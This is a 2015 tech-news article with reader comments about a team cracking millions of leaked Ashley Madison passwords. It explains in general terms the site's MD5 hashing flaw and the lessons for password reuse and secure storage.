Team manages to crack more than 11 million Ashley Madison passwords

By Scorpus
Sep 11, 2015
Post New Reply
  1. The Ashley Madison hack has been nothing short of a disaster. Among the gigabytes of data leaked from the website's servers were 36 million passwords protected via an intense, slow algorithm known as bcrypt. Normally these passwords would take centuries to crack, but due to a programming error on Ashley Madison's part, 15.26 million of the passwords are vulnerable to much faster decryption.

    CynoSure Prime, the group behind the cracking effort, discovered that around 40 percent of the passwords were obscured via the MD5 hashing algorithm, and stored alongside a bcrypt-hashed version. MD5 hashes are significantly easier to crack than bcrypt hashes, as the algorithm was designed primarily for speed rather than security.

    The programming error involved storing an MD5-hashed "$loginkey" token that contained both the user's username and plaintext password converted to lowercase. Cracking these tokens was relatively easy, as all CynoSure Prime had to do was select a username and guess billions upon billions of passwords.

    After the MD5 hashes were cracked, the team then had to restore the multi-case version of the password and test it against the bcrypt hash. While testing this hash was a relatively slow process, around 90 percent of users didn't even bother with a multi-case password, and testing the remaining ten percent turned out to be fairly straightforward.

    Thanks to Ashley Madison's use of the efficient MD5 algorithm, the cracking team was able to successfully decrypt 11.2 million passwords in around ten days, and it won't take long to decrypt the remaining four million. The team estimated that cracking the MD5 hashes rather than the bcrypt hashes was around a million times faster.

    The ease of cracking these passwords shows how important it is not to use the same password for more than one service, which prevents attackers from cracking username/password combinations and using them to unlock other accounts.

    It also highlights to developers what not to do when storing passwords, as the MD5-hashed login credentials could have easily been made significantly more secure by hashing the bcrypt-protected password rather than a plaintext version. In fact the developers implemented this hashing solution after a certain point, which is why 60 percent of leaked Ashley Madison passwords remain uncracked.

    Permalink to story.

  2. stewi0001

    stewi0001 TS Evangelist Posts: 1,136   +480

    Is the site shutdown yet?
  3. NightAngel79

    NightAngel79 TS Booster Posts: 159   +37

    Nope, still says, "Join over 40,000,000 anonymous members" LMFAO!!
  4. Camikazi

    Camikazi TS Maniac Posts: 797   +217

    Considering they had around 37 million when this all started it seems they had added more users.
    NightAngel79 likes this.
  5. cmbjive

    cmbjive TS Booster Posts: 777   +137

    Moral of the story: Don't cheat.

    Immoral of the story: If you're going to cheat, don't use an online service.
  6. DaveBG

    DaveBG TS Addict Posts: 216   +72

    Haha I bet they have just run the female creator bot for a while.
    NightAngel79 likes this.
  7. Skidmarksdeluxe

    Skidmarksdeluxe TS Evangelist Posts: 6,335   +1,937

    I wonder how many of the passwords were s***m*c***... ;)
  8. Skidmarksdeluxe

    Skidmarksdeluxe TS Evangelist Posts: 6,335   +1,937

    Yeah. Maybe the new users like the thrill of the chase, maybe they like the thrill of... err.. I guess you can figure that out or maybe they just never knew a site like this existed and discovering it was like manna from heaven. I dunno. Who knows how these two timers think?
  9. Skidmarksdeluxe

    Skidmarksdeluxe TS Evangelist Posts: 6,335   +1,937

    The only logical conclusion I can come to is maybe "0" key on the keyboard was sticky.
  10. Satish Mallya

    Satish Mallya TS Addict Posts: 124   +92

    This now actually makes it much easier to identify users - trawling through someone's email can uniquely identify them a lot more easily than simply knowing their email addresses, possibly with info like their physical addresses, contacts, etc.

    Plus all the other attached accounts.

Similar Topics

Add New Comment

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...